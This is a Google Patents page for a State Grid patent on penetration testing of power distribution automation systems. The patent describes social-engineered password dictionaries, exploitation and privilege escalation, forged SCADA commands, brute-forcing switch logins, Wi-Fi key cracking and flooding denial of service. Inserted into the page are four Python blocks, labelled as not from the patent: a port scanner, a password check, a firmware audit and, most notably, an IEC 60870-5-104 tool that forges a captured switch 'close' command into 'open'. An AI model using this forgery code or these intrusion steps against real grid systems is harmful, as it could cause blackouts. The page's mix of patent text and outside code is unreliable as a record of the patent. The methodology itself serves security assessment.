
CN104468267B - A kind of electrical power distribution automatization system information security penetration testing method - Google Patents


Info

Publication number: CN104468267B
Application number: CN201410680264.6A
Authority: CN (China)
Prior art keywords: penetration testing, network, information, test, testing
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN104468267A
Inventors:
陈亮
林永峰
张国强
殷博
王剑锋
项添春
李国栋
李洁
崔洁
石伟
唐萍
谢浩
李志斌
黄刚
李晓辉
龚成虎
赵晶
王侃
梁蕊宏
Current assignee: State Grid Corp of China SGCC; State Grid Tianjin Electric Power Co Ltd
Original assignee: State Grid Corp of China SGCC; State Grid Tianjin Electric Power Co Ltd
Application filed by State Grid Corp of China SGCC and State Grid Tianjin Electric Power Co Ltd; priority to CN201410680264.6A; published as CN104468267A; application granted and published as CN104468267B.


Abstract

The invention discloses an information security penetration testing method for a power distribution automation system. Penetration testing is carried out on the master station system, the distribution terminals and the communication channel. Making full use of information-system vulnerability penetration testing techniques, the security of the distribution automation system is assessed by simulating the attack methods of a hacker, including active analysis of any weakness, technical defect or vulnerability of the master station system, the communication lines and the distribution terminals. The method can be used for security risk analysis before the distribution automation system is connected to the network, and gives guidance to manufacturers whose equipment has potential safety hazards when they carry out rectification and re-testing. The method is strongly targeted and wide in test scope, greatly shortens the test time compared with conventional penetration testing, and reduces the occurrence of off-line maintenance events caused by security faults after equipment goes on line. It not only satisfies information security risk penetration testing of distribution automation systems but also extends to industrial control systems inside and outside the power industry.

Description

Electrical power distribution automation system information security penetration testing method
Technical field
The invention belongs to the technical field of industrial control system information security risk analysis, and more particularly relates to an information security penetration testing method for a power distribution automation system.
Background technology
Driven by informatization, industrial control systems and conventional information security, which once seemed two unrelated fields, have come to overlap; especially since the "Stuxnet" incident, industrial control system information security has attracted the great attention of many countries. Industrial control systems are involved in all kinds of critical infrastructure and in the national economy, and their importance is self-evident. For a long time industrial control systems were regarded as relatively specialised, closed information islands and remained comparatively safe. But with the rapid networking and interconnection of industrial control systems in recent years, all kinds of industrial infrastructure, including the power industry, have one after another been invaded by viruses and even by hackers, and people have started to look closely again at the security of industrial control systems.
However, because industrial control system design originally focused only on reliability and real-time behaviour, information security was neglected for a long time, and popular information security measures such as intrusion detection, firewalls and vulnerability patching are difficult to deploy unchanged in industrial control networks because of compatibility problems with legacy systems, so the vulnerabilities and hidden dangers present in these systems are hard to protect effectively. The long-standing risks of industrial control systems have become an important factor affecting the stable operation of national infrastructure.
The power distribution automation system, as the important industrial control system of the power-consumption link of the power grid, is typical and representative. The potential risks it faces are mainly:
1) Master station system risk: because the master station server operating system version is too old or the security policy is imperfectly configured, numerous security vulnerabilities exist in the master station operating system.
2) Communication line risk: with the rapid development of medium and low voltage distribution networks, some low-voltage distribution networks that lack optical fibre communication conditions transmit control instructions over public communication networks, exposing the system to attacks from the public network.
3) Distribution terminal risk: distribution terminals are large in number and varied in type, and the terminal systems are mostly early versions of embedded systems such as VxWorks and Linux, with risks of information leakage, illegal access and being taken under control.
Therefore it is necessary to carry out information security risk penetration testing research for distribution automation systems, to probe the security of the system in depth by simulating as fully as possible the vulnerability discovery techniques and attack means used by hackers, to discover the fragile links in the system, and to guarantee its safe and stable operation.
The content of the invention
The object of the invention is to overcome the shortcoming that existing penetration testing methods are not strongly targeted at distribution automation systems, and to provide a reasonably designed, fast and accurate penetration testing method for information security hazards of a distribution automation system, which makes full use of information-system vulnerability penetration testing techniques and assesses the security of the distribution automation system through simulated hacker attacks, including active analysis of any weakness, technical defect or vulnerability of the master station system, the communication lines and the distribution terminals.
The object of the invention is to provide an information security penetration testing method for a distribution automation system, which includes:
Step 1, penetration testing of the master station system;
Step 2, penetration testing of the distribution terminals;
Step 3, penetration testing of the communication channel.
Further, in step 1, the concrete method of penetration testing the master station system is:
Delimit the test scope: the SCADA servers, FES servers and WEB servers are delimited as the target network environment, and the test content, test method, test conditions and test targets are determined;
Use all kinds of public resources to obtain information relating to the test target;
Locate the target's network state, operating system and related network architecture;
Find all open ports on the target system and enumerate the services currently running through the open ports;
From the personal mailboxes and telephone numbers commonly used by the administrator, commonly used user accounts and other highly reliable background information, build a more meaningful weak-password dictionary and carry out weak-password scanning;
Discover vulnerabilities by combining the two different test methods, automatic and manual;
Exploit the vulnerabilities, penetrating the target system with existing exploit programs;
The tester elevates his own privileges using a local vulnerability suited to the current system environment and obtains super-user or system-level privileges.
Further, when public resources are used to obtain information relating to the test target, the information on the target can be collected from the internet, related data can be obtained from the various search engines, and professional tools using data-mining techniques can be used to collect useful information;
When finding all open ports on the target system and enumerating the running services through them, a series of port scanning techniques can be used to detect whether a port is open; the port scanning techniques include full-open scanning, half-open scanning and stealth scanning;
If no weak password is found, the vulnerabilities present in the target system can be located and analysed on the basis of the open ports and service programs already discovered; the specific testing work can be handed over to vulnerability detection tools;
When exploiting vulnerabilities to penetrate the target system with existing exploit programs, the tester can combine client-side exploit programs with social engineering to take control of the target system;
When the tester elevates privileges with a local vulnerability suited to the current system environment and obtains super-user or system-level privileges, the tester can also go on to attack the internal network; depending on the target scope defined earlier, this kind of attack may be restricted or unrestricted; by sniffing network packets, cracking the passwords of various services and using data-forgery attacks in the internal network, it may be possible to obtain more information about the controlled system; the final purpose of privilege escalation is to obtain the highest access rights to the target system.
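The port enumeration step above names three scan types. Of these only the full-open scan (a complete TCP three-way handshake per port) can be done without raw sockets, so that is the one implemented here. This Python is an added example and not code from the patent: it runs a threaded connect scan, maps open ports to a service label, and starts a throw-away loopback listener so the whole thing runs offline. The host, the port list and the SCADA-oriented service table are assumptions for the demonstration; half-open (SYN) and stealth (FIN/NULL/Xmas) scans are not shown.

```python
"""Full-open (TCP connect) port scan with service enumeration.

Added example for the master station enumeration step; not code from the
patent. A local listener on a loopback port is constructed so the scan
runs offline. Host, ports and SERVICE_HINTS are assumptions.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Hypothetical mapping of ports to the services a distribution master
# station is typically expected to expose. A port number alone proves
# nothing: real results must be confirmed by banner grabs or protocol probes.
SERVICE_HINTS = {
    80: "http (WEB server)",
    443: "https (WEB server)",
    1433: "mssql (historian/database)",
    1521: "oracle (historian/database)",
    2404: "iec-104 (SCADA/FES front end)",
    20000: "dnp3",
}


def probe(host, port, timeout=0.5):
    """Return (port, True) if a full TCP handshake completes, else (port, False).

    connect_ex returns 0 on success and an errno otherwise, so a closed or
    filtered port simply yields a non-zero code instead of an exception.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return port, s.connect_ex((host, port)) == 0


def connect_scan(host, ports, workers=32, timeout=0.5):
    """Scan `ports` on `host` concurrently; return a sorted list of open ports."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(p for p, is_open in results if is_open)


def service_name(port):
    """Best-effort service label: the SCADA hints first, then /etc/services."""
    if port in SERVICE_HINTS:
        return SERVICE_HINTS[port]
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return "unknown"


def start_listener(host="127.0.0.1"):
    """Constructed target: bind an ephemeral loopback port and accept connections."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:
                break  # listener shut down: stop the thread

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def stop_listener(srv):
    """shutdown() wakes the blocked accept() so the serve thread exits cleanly."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def demo():
    """Scan a small range around the constructed listener and label what is open."""
    srv, open_port = start_listener()
    try:
        found = connect_scan("127.0.0.1", [open_port, open_port + 1, open_port + 2])
        return {p: service_name(p) for p in found}
    finally:
        stop_listener(srv)


if __name__ == "__main__":
    for port, svc in demo().items():
        print(f"{port}/tcp open  {svc}")
```

On a real master station the scan should be throttled and scheduled with the operator: a burst of connects against an FES or a database port can itself be the "denial of service" the later steps of the method test for.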
Further, in step 2, the concrete method of penetration testing the distribution terminals is:
Information search test: the penetration testing engineer asks the administrator about the bus structure, protocol type and asset importance level, scans the network with dedicated protocol addressing software, learns which terminals in the industrial control network are alive and their addresses, and performs an information collection test;
System vulnerability collection: the penetration testing engineer searches for the latest vulnerability information on the website of the United States industrial control system cyber emergency response team (www.us-cert.gov/control_systems/ics-cert/) and on the industrial control security forum www.scadahacker.com, in particular vulnerabilities of programming systems;
Vulnerability scanning: the penetration testing engineer scans the lower computer (field device) for vulnerabilities using, for example, the NESSUS SCADA plug-ins, and finds known vulnerabilities and their severity;
Firmware vulnerability collection: the penetration testing engineer looks up the device vulnerability information and latest firmware version in the security bulletins of the device manufacturer, and determines the presence of vulnerabilities by checking whether the device has been upgraded to the latest firmware version in time;
Vulnerability exploitation test: the penetration testing engineer writes exploit programs for the lower computer with tools such as METASPLOIT, or collects exploit programs from industrial control security forums, and tests and verifies the seriousness of the vulnerabilities;
Code download test: the penetration testing engineer uses dedicated programming software or command debugging software to learn the terminal's configuration, such as whether source code download is allowed, whether compiled code download is allowed, whether the code is encrypted and whether it can be read remotely;
Code upload test: using a forged engineer station, the penetration testing engineer performs a firmware upgrade or code update on the terminal with programming system software or command debugging software, and tests whether the new code can be executed successfully;
Lower computer instruction test: the penetration testing engineer captures the data sent by the terminal at the data link, network, transport and application layers with packet sniffing software such as SNIFFER, inspects the packet content, source address and destination address with a dedicated protocol analyser, modifies the data and resends it, and checks whether the substation receives and executes it;
Upper computer instruction test: the penetration testing engineer captures the data sent by the upper computer at the data link, network, transport and application layers with packet sniffing software such as SNIFFER, inspects the command content, source address and destination address with a dedicated protocol analyser, modifies the master station's instructions, forges instructions from the upper computer to the lower computer, and checks whether the substation receives and executes them;
Denial of service test: the penetration testing engineer sends a large number of broadcast packets to fill the data buffer of the slave station, so that the slave station can no longer receive the data sent by the master station normally.
Further, in step 3, the concrete method of penetration testing the communication channel is:
Network access test: the penetration testing engineer connects the test tool to the industrial control system network through an industrial switch by wired access, or by wireless access, searching for the wireless network signal and joining the industrial control system network;
Wireless network strength test: the penetration testing engineer uses wireless cracking tools such as BT against WEP, WPA, WPA2, AES and DES, obtains the encryption key and then accesses the industrial control system network with a legitimate identity (in practice such tools recover WEP keys by statistical attack on captured traffic and WPA/WPA2 pre-shared keys by dictionary attack on the captured handshake; the AES and DES ciphers themselves are not broken, so the strength of the pre-shared key is what this test measures);
Network device vulnerability collection test: the penetration testing engineer inspects the network devices, for example the firmware of industrial switches, checks whether it is the latest version, and searches for the latest vulnerability information on the industrial control security forum www.scadahacker.com;
Network device control detection: the penetration testing engineer tries to log in to the administrator account using weak passwords and brute force; after obtaining administrator rights, the configuration of the network device can be modified, for example port information, network segment isolation and device addresses, so as to interrupt sessions, impersonate the master station and perform other tests;
Message monitoring test: the penetration testing engineer captures the data sent by the terminal at the data link, network, transport and application layers with packet sniffing software such as SNIFFER, and inspects the packet content, source address and destination address with a dedicated protocol analyser;
Message modification test: the penetration testing engineer analyses the captured packets, modifies their source address, destination address and data content, and sends the packets again;
Denial of service test: the penetration testing engineer sends a large number of broadcast packets to fill the data buffer of the slave station so that it can no longer receive the data sent by the master station normally, or restarts the network device so that network sessions are interrupted, causing a network denial of service.
Further, the method is used for penetration testing of the master station system, the communication channel and the distribution terminals; the master station system is communicatively connected with the distribution terminals through the communication channel; the communication channel includes Ethernet and GPRS, and the distribution terminals include DTU, FTU and DTU/FTU distribution terminals.
The information security penetration testing method for a distribution automation system provided by the invention carries out penetration testing of the master station system, the distribution terminals and the communication channel. The assessment of the master station system is aimed at known software vulnerability classes and uses black-box testing, mainly security detection with SCADA vulnerability scanners, operating system vulnerability scanners, database vulnerability scanners and application system vulnerability scanners. The assessment of the communication protocol compares the details of the message interaction: a software test tool simulates the client and server ends to send and receive messages and responses, assisted by a message recording and analysis tool. The distribution automation system mainly uses the IEC 60870-5-101 and 104 protocols, whose functions must be implemented consistently with the IEC 60870-5-101 and 104 standards; the test content includes checking the configuration parameters and verifying the communication process, with test cases based on the relevant content of the DL/T 634.56, IEC 60870-5-601 and IEC 60870-5-604 standards. Terminal penetration testing mainly includes active analysis of any weakness, technical defect or vulnerability of the terminal's hardware layer, system layer, software layer and communication layer; this analysis is carried out from the position an attacker might occupy, and from that position security vulnerabilities are actively exploited where conditions allow. The invention can be used for security risk analysis before the distribution automation system is networked and gives guidance to manufacturers whose equipment has potential safety hazards for rectification and re-testing; it is strongly targeted and wide in test scope, greatly shortens the test time compared with conventional penetration testing, reduces off-line maintenance events caused by security faults after equipment goes on line, not only satisfies information security risk penetration testing of distribution automation systems but also extends to industrial control systems inside and outside the industry, avoids large-scale blackouts of distribution stations caused by information security attacks, and provides important support for the information security guarantee of national industrial control systems.
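The instruction tests in steps 2 and 3 (capture a master station command, modify or forge it, resend it and check whether the substation executes it) and the IEC 60870-5-104 protocol assessment above both rest on one property of the protocol: a 104 APDU carries sequence numbers but no authentication or integrity field, so a forged command is indistinguishable from a genuine one at the protocol level. The following Python is an added example, not code from the patent: it builds and parses 104 I-, S- and U-format frames and a C_SC_NA_1 single command as IEC 60870-5-104 defines them (2-byte common address, 2-byte cause of transmission, 3-byte information object address), then turns a captured "close" command into a forged "open" command. The station address, information object address and sequence numbers are constructed sample values.

```python
"""IEC 60870-5-104 APDU builder/parser and a command-forgery demonstration.

Added example for the upper/lower computer instruction tests and the 104
protocol assessment; not code from the patent. Addresses and sequence
numbers are constructed sample values.
"""
import struct

START = 0x68
C_SC_NA_1 = 45          # single command type identification
COT_ACTIVATION = 6      # cause of transmission: activation
U_STARTDT_ACT = 0x07    # U-format control byte 1 for STARTDT act
U_TESTFR_ACT = 0x43     # U-format control byte 1 for TESTFR act


def build_apci_i(ns, nr):
    """I-format control field: N(S) and N(R) are 15-bit counters shifted left by 1."""
    return struct.pack("<HH", (ns << 1) & 0xFFFE, (nr << 1) & 0xFFFE)


def build_apdu(control, asdu=b""):
    """Prefix the 4 control bytes plus ASDU with the start byte and APDU length."""
    body = control + asdu
    if len(body) > 253:
        raise ValueError("APDU length field is one byte (max 253)")
    return bytes([START, len(body)]) + body


def build_single_command(ca, ioa, close, select, cot=COT_ACTIVATION, originator=0):
    """C_SC_NA_1 ASDU with one object; SCO = S/E (bit 7) | QU (bits 2-6, 0) | SCS (bit 0)."""
    vsq = 0x01                                      # SQ=0, one information object
    cot_bytes = bytes([cot & 0x3F, originator])     # T=0, P/N=0 (positive), originator addr
    ioa_bytes = struct.pack("<I", ioa)[:3]          # 3-byte little-endian IOA
    sco = (0x80 if select else 0x00) | (0x01 if close else 0x00)
    return (bytes([C_SC_NA_1, vsq]) + cot_bytes + struct.pack("<H", ca)
            + ioa_bytes + bytes([sco]))


def parse_apdu(frame):
    """Decode the APCI and, for I-format, the ASDU header and first object."""
    if len(frame) < 6 or frame[0] != START or frame[1] != len(frame) - 2:
        raise ValueError("not a well-formed 104 APDU")
    c1, c2, c3, c4 = frame[2:6]
    out = {}
    if (c1 & 0x01) == 0:                            # I-format: bit 0 of byte 1 is 0
        out["format"] = "I"
        out["ns"] = (c1 | (c2 << 8)) >> 1
        out["nr"] = (c3 | (c4 << 8)) >> 1
        asdu = frame[6:]
        out["type"] = asdu[0]
        out["sq"] = asdu[1] >> 7
        out["count"] = asdu[1] & 0x7F
        out["cot"] = asdu[2] & 0x3F
        out["negative"] = bool(asdu[2] & 0x40)
        out["originator"] = asdu[3]
        out["ca"] = struct.unpack("<H", asdu[4:6])[0]
        out["ioa"] = asdu[6] | (asdu[7] << 8) | (asdu[8] << 16)
        if asdu[0] == C_SC_NA_1:
            sco = asdu[9]
            out["select"] = bool(sco & 0x80)
            out["close"] = bool(sco & 0x01)
    elif (c1 & 0x03) == 0x01:                       # S-format: bits 1..0 == 01
        out["format"] = "S"
        out["nr"] = (c3 | (c4 << 8)) >> 1
    else:                                           # U-format: bits 1..0 == 11
        out["format"] = "U"
        out["function"] = c1
    return out


def forge_opposite_command(captured, new_ns):
    """Re-issue a captured single command with the switch state inverted.

    Only the SCS bit and N(S) change. Nothing else in the frame lets the
    outstation tell this forgery from the master station's original.
    """
    info = parse_apdu(captured)
    if info.get("type") != C_SC_NA_1:
        raise ValueError("captured frame is not a single command")
    asdu = build_single_command(info["ca"], info["ioa"], close=not info["close"],
                                select=info["select"], cot=info["cot"],
                                originator=info["originator"])
    return build_apdu(build_apci_i(new_ns, info["nr"]), asdu)


def demo():
    """Master closes the switch at IOA 0x1234 on station 1; attacker forges 'open'."""
    original = build_apdu(build_apci_i(ns=3, nr=5),
                          build_single_command(ca=1, ioa=0x1234, close=True, select=False))
    forged = forge_opposite_command(original, new_ns=4)
    return original, forged


if __name__ == "__main__":
    orig, fake = demo()
    print("captured:", orig.hex(" "), parse_apdu(orig))
    print("forged:  ", fake.hex(" "), parse_apdu(fake))
```

The forged frame passes every check a conformance test per IEC 60870-5-604 would apply, which is why the page's instruction tests have to be run against the real outstation rather than a protocol checker. The protection has to come from outside the 104 frame, for example transport protection (the TLS profile in IEC 62351-3) or strict segmentation of the channel.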
Brief description of the drawings
Fig. 1 is the implementation flow chart of the information security penetration testing method for a distribution automation system provided by an embodiment of the invention;
Fig. 2 is a schematic diagram of the simplified abstract model of the distribution automation system targeted by the method provided by an embodiment of the invention;
Fig. 3 is the flow chart of the concrete method by which the master station system is penetration tested, provided by an embodiment of the invention.
Embodiment
In order to make the purpose, technical scheme and advantages of the invention clearer, the invention is described in further detail below with reference to the drawings and embodiments. It should be understood that the specific embodiments described here only illustrate the invention and are not intended to limit it.
Fig. 1 shows the implementation flow of the information security penetration testing method for a distribution automation system provided by an embodiment of the invention.
The method includes:
Step S101, penetration testing of the master station system;
Step S102, penetration testing of the distribution terminals;
Step S103, penetration testing of the communication channel.
In the embodiment of the invention, the concrete method of penetration testing the master station system in step S101, the distribution terminals in step S102 and the communication channel in step S103, and the use of the method for the master station system, the communication channel (Ethernet, GPRS) and the distribution terminals (DTU, FTU, DTU/FTU), are the same as set out above under "The content of the invention" (Step 1 to Step 3 and the "Further" paragraphs that follow them); the embodiment repeats them unchanged. Fig. 3 shows the flow chart of the concrete method by which the master station system is penetration tested.
Below in conjunction with the accompanying drawings and specific embodiment is further described to the application principle of the present invention.
As shown in Fig. 2 electrical power distribution automatization system information security hidden danger penetration testing method provided by the invention mainly for Main station system, communication port (Ethernet, GPRS etc.), distribution network terminal (DTU, FTU etc.) three parts.
Main station system penetration testing:
1) Target scope delimitation. Before master station penetration testing begins, the tester should first observe and understand the scope of the given target network environment, which specifically includes the SCADA servers, FES servers and WEB servers. In the scope-delimitation stage the following outline needs to be defined: what is tested, how it is tested, what conditions are required, what limitations apply during test execution, how long the test will take to complete, and what business objectives need to be achieved.
2) Information gathering. After the test scope is delimited, the information investigation stage follows. In this stage the penetration tester uses various public resources to obtain more information relating to the test target. This information can be collected from the internet: relevant data can be obtained from various search engines, or professional tools using data-mining techniques can collect useful information. The more information is collected, the higher the probability that the penetration test succeeds.
3) Target detection. The main task of this stage is to locate the target's network state, operating system and associated network architecture. This stage completely reveals the technologies currently used by the target network and the devices connected to it; this information helps the tester further enumerate the various services running in the target network.
4) Target enumeration. This stage further uses the results of the preceding stages to find all open ports in the target system. Once all open ports have been found, the services currently running behind them can be enumerated. By using a series of port scanning techniques, such as full-open scanning, half-open scanning and stealth scanning, the open state of ports can be detected even when the target host is protected by a firewall or an intrusion detection system. Mapping the ports open on a host to the corresponding service programs helps further uncover vulnerabilities that may exist in the target network infrastructure. This stage therefore lays the foundation for discovering vulnerabilities in the various network devices in the subsequent tests, and all of those vulnerabilities may cause serious harm.
5) Weak password scanning. Having gathered enough information, the tester can think divergently. Since trust on the current internet is mainly guaranteed in the form of user names and passwords, passwords become the weak point of people. Information related to the test target is sorted out with reference to social engineering, for example the administrator's commonly used personal mailbox, telephone number, commonly used user accounts and other highly reliable background information. This information is made into a more meaningful weak password dictionary; a dictionary built with social engineering makes exhaustive testing more meaningful.
6) Vulnerability discovery. If no weak password is found, vulnerabilities in the target system can be located and analyzed on the basis of the open ports and service programs already discovered. The specific testing work can be left to vulnerability-detection tools. These tasks can of course also be done manually, but doing so costs a great deal of time and requires expert-level knowledge. By combining the two different testing methods, automatic and manual, the tester gains a clear understanding and can carefully test for any known and unknown vulnerabilities that would otherwise remain in the target network system.
7) Vulnerability exploitation. After the vulnerabilities in the target system have been examined and discovered, the target system can be penetrated through existing exploit programs. Sometimes additional research and modification are needed to make an existing exploit program work properly. This sounds somewhat difficult, but using an advanced exploitation tool makes the work much simpler. In addition, the tester can combine client-side exploit programs with social engineering to control the target system. This stage focuses mainly on how to take down the target system.
8) Privilege escalation. Once the target system is controlled, the penetration work has been completed successfully. Next, the tester can act freely within the system, with a degree of freedom that depends on the access rights obtained. The tester can also use local vulnerabilities suited to the current system environment to escalate privileges; once such an escalation exploit succeeds, superuser or system-level privileges can be obtained. With this as a point of entry, the tester can further attack the internal network system; depending on the target scope defined earlier, this kind of attack may be restricted or unrestricted. By sniffing network packets, cracking the passwords of various services and using data-forgery attacks in the internal network, more information about the controlled system can be obtained. The ultimate purpose of privilege escalation is therefore to obtain the highest access rights on the target system.
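The weak password scanning stage above builds its dictionary from the administrator's mailbox, telephone number and account names. The defender-side counterpart is a password policy check that refuses any password derivable from that same background information; the following is an added example written for this page, not the patent's own method, and the mailbox, phone number, account name, suffix list and passwords in it are constructed placeholders.

```python
"""Password policy check against the background information named in stage 5.

Added example (not from the patent). It audits whether a candidate password is
derivable from an administrator's personal mailbox, telephone number or account
name, i.e. whether it would appear in the kind of social-engineering dictionary
the text describes. All sample values are constructed for this example.
"""
from __future__ import annotations

import re

# Suffixes that commonly turn a known token into a "meaningful" weak password.
# Constructed list; a real policy would load this from configuration.
COMMON_SUFFIXES = ("", "1", "123", "!", "@123", "2014", "#1")

# Minimum token length for the substring check, so that short fragments such
# as a two- or three-letter name part do not cause false positives.
MIN_SUBSTRING_TOKEN = 4


def background_tokens(mailbox: str, phone: str, account: str) -> set[str]:
    """Derive the tokens an attacker would build a weak-password dictionary from."""
    tokens: set[str] = set()
    local_part = mailbox.split("@", 1)[0].lower()
    tokens.add(local_part)
    # Split the mailbox local part on common separators (zhang.wei -> zhang, wei).
    for piece in re.split(r"[._\-]+", local_part):
        if len(piece) >= 3:
            tokens.add(piece)
    tokens.add(account.lower())
    digits = re.sub(r"\D", "", phone)
    if digits:
        tokens.add(digits)          # full number without separators
        tokens.add(digits[-4:])     # last four digits, a classic PIN-style suffix
        tokens.add(digits[-6:])     # last six digits
    return {t for t in tokens if t}


def is_derivable(password: str, mailbox: str, phone: str, account: str) -> tuple[bool, str]:
    """Return (True, reason) if the password is derivable from the background info.

    Two checks are made, both case-insensitive: an exact match of a token plus
    a common suffix, and containment of any token of at least MIN_SUBSTRING_TOKEN
    characters anywhere in the password.
    """
    pw = password.lower()
    for token in sorted(background_tokens(mailbox, phone, account)):
        for suffix in COMMON_SUFFIXES:
            if pw == token + suffix:
                return True, f"equals token {token!r} plus suffix {suffix!r}"
        if len(token) >= MIN_SUBSTRING_TOKEN and token in pw:
            return True, f"contains token {token!r}"
    return False, ""


# Constructed administrator background information used by the demonstration.
SAMPLE_MAILBOX = "zhang.wei@example.com"
SAMPLE_PHONE = "+86 138-0000-1234"
SAMPLE_ACCOUNT = "zwadmin"

if __name__ == "__main__":
    for candidate in ("Zhang123", "zwadmin!", "x001234y", "Tianjin2014!"):
        derivable, reason = is_derivable(candidate, SAMPLE_MAILBOX, SAMPLE_PHONE, SAMPLE_ACCOUNT)
        print(f"{candidate!r}: {'REJECT' if derivable else 'ok'} {reason}")
```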
Distribution terminal penetration testing:
1) Information gathering test. The penetration testing engineer asks the administrator about the bus structure, protocol type and asset importance level, and performs a network scan with dedicated protocol addressing software to learn which terminals are alive in the industrial control network and their addresses.
2) System vulnerability collection. The penetration testing engineer searches for the latest vulnerability information and dedicated programming-system vulnerabilities on the website of the US Industrial Control Systems Cyber Emergency Response Team, www.us-cert.gov/control_systems/ics-cert/, on the industrial-control security site www.scadahacker.com, and on related professional forums.
3) Vulnerability scanning. The penetration testing engineer scans the lower-level (slave computer) devices for vulnerabilities using, for example, the NESSUS SCADA plug-ins, to find known vulnerabilities and their severity.
4) Firmware vulnerability collection. The penetration testing engineer looks up the vulnerability information and the latest firmware version of the device in the security bulletins of the lower-level device's manufacturer, and determines whether vulnerabilities exist by checking whether the device has been upgraded to the latest firmware version in time.
5) Vulnerability exploitation test. Using tools such as METASPLOIT, the penetration testing engineer writes exploit programs for the lower-level device, or collects exploit programs from industrial-control security professional forums, to test and verify the severity of the vulnerabilities.
6) Code download test. Using dedicated programming software or command debugging software, the penetration testing engineer learns the terminal device's settings, such as whether source code download is allowed, whether compiled code download is allowed, whether the code is encrypted, and whether it can be read remotely.
7) Code upload test. Using a forged engineer station with programming-system software or command debugging software, the penetration testing engineer performs a firmware upgrade or code update on the terminal and tests whether the new code can be executed successfully.
8) Slave computer command test. Using packet sniffing software such as SNIFFER, the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic to obtain the data sent by the terminal, inspects the packet content, source address and destination address with a dedicated protocol analyzer, modifies the data, resends it, and checks whether the substation receives and executes it.
9) Host computer command test. Using packet sniffing software such as SNIFFER, the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic to obtain the data sent by the host computer, inspects the command content, source address and original address with a dedicated protocol analyzer, modifies the master station's command, forges a host-to-slave command, and checks whether the substation receives and executes it.
10) Denial-of-service test. The penetration testing engineer fills the slave station's data buffer by sending a large number of broadcast packets, so that the slave station can no longer normally receive the data sent by the master station.
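Step 4 decides whether a terminal is exposed by comparing its running firmware with the manufacturer's bulletin. The check below is an added example written for this page (not the patent's or any vendor's code): it parses version strings of differing shapes, treats "2.3" as "2.3.0" and orders "1.10" after "1.9", and reports both whether the terminal is behind the latest release and which advisories it remains exposed to. The device models, advisory identifiers and version numbers are constructed placeholders, and the bulletin would in practice be loaded from the vendor's published data.

```python
"""Firmware version check for distribution terminals (step 4 above).

Added example, not the patent's code. VENDOR_BULLETIN and LATEST_FIRMWARE stand
in for a manufacturer's security bulletin; every identifier in them is a
constructed placeholder.
"""
from __future__ import annotations

import re

# Constructed bulletin: model -> list of (advisory_id, first firmware version
# in which that advisory is fixed).
VENDOR_BULLETIN = {
    "DTU-200": [("VENDOR-ADV-0001", "2.3.1"), ("VENDOR-ADV-0007", "2.5.0")],
    "FTU-100": [("VENDOR-ADV-0003", "1.10.0")],
}
# Constructed: latest published firmware per model.
LATEST_FIRMWARE = {"DTU-200": "2.5.0", "FTU-100": "1.10.2"}


def parse_version(version: str) -> tuple[int, ...]:
    """Turn strings such as 'V2.3.1b' or '2.3' into a comparable tuple of ints.

    A leading 'v'/'V' and any trailing suffix are ignored. Missing components
    count as 0, so '2.3' == '2.3.0'; integer comparison makes '1.10' > '1.9'.
    """
    m = re.match(r"v?(\d+(?:\.\d+)*)", version.strip(), re.IGNORECASE)
    if not m:
        raise ValueError(f"unparseable firmware version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def firmware_findings(model: str, running_version: str) -> dict:
    """Report whether a terminal is behind the latest firmware and which
    advisories from the bulletin its running version is still exposed to."""
    running = parse_version(running_version)
    latest = LATEST_FIRMWARE.get(model)
    exposed = [
        advisory
        for advisory, fixed_in in VENDOR_BULLETIN.get(model, [])
        if running < parse_version(fixed_in)
    ]
    return {
        "model": model,
        "running": running_version,
        "latest": latest,
        # An unknown model cannot be judged outdated; it is reported as such.
        "outdated": latest is not None and running < parse_version(latest),
        "exposed_to": exposed,
    }


def audit_inventory(inventory: list[tuple[str, str, str]]) -> list[dict]:
    """inventory: (terminal_address, model, running_version) triples, as the
    live-terminal scan in step 1 would produce them (constructed here)."""
    return [
        dict(address=address, **firmware_findings(model, version))
        for address, model, version in inventory
    ]


# Constructed inventory for the demonstration.
SAMPLE_INVENTORY = [
    ("192.0.2.21", "DTU-200", "V2.3.0"),
    ("192.0.2.22", "DTU-200", "2.5"),
    ("192.0.2.31", "FTU-100", "1.10.0"),
    ("192.0.2.40", "RTU-X", "1.0"),      # model absent from the bulletin
]

if __name__ == "__main__":
    for finding in audit_inventory(SAMPLE_INVENTORY):
        print(finding)
```

A terminal can be free of every listed advisory yet still outdated (the FTU-100 at 1.10.0 above), which is why the check reports the two conditions separately.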
Communication channel penetration testing:
1) Network connection test: The penetration testing engineer connects the testing tools to the industrial control system network either in wired access mode, through an industrial switch, or in wireless access mode, by searching for wireless network signals.
2) Wireless network strength test: Using wireless cracking tools such as BT, the penetration testing engineer cracks WEP, WPA, WPA2, AES and DES to obtain the encryption key, and then accesses the industrial control system network with a legitimate identity.
3) Network device vulnerability collection test: The penetration testing engineer checks the firmware of network devices such as industrial switches to see whether it is the latest version, and searches for the latest vulnerability information on the industrial-control security professional forum www.scadahacker.com.
4) Network device control detection: The penetration testing engineer attempts to log in to the administrator account using weak passwords and brute force; after obtaining administrator rights, the configuration information of the network device can be modified, for example port information, network segment isolation information and device addresses, to carry out tests such as interrupting sessions and impersonating the master station.
5) Message monitoring test: Using packet sniffing software such as SNIFFER, the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic to obtain the data sent by the terminal, and inspects the packet content, source address and destination address with a dedicated protocol analyzer.
6) Message modification test: The penetration testing engineer analyzes the captured packets, modifies their source address, destination address and data content, and then resends them.
7) Denial-of-service test: The penetration testing engineer fills the slave station's data buffer by sending a large number of broadcast packets, so that the slave station can no longer normally receive the data sent by the master station, or restarts the network device to interrupt the network session, causing a network denial of service.
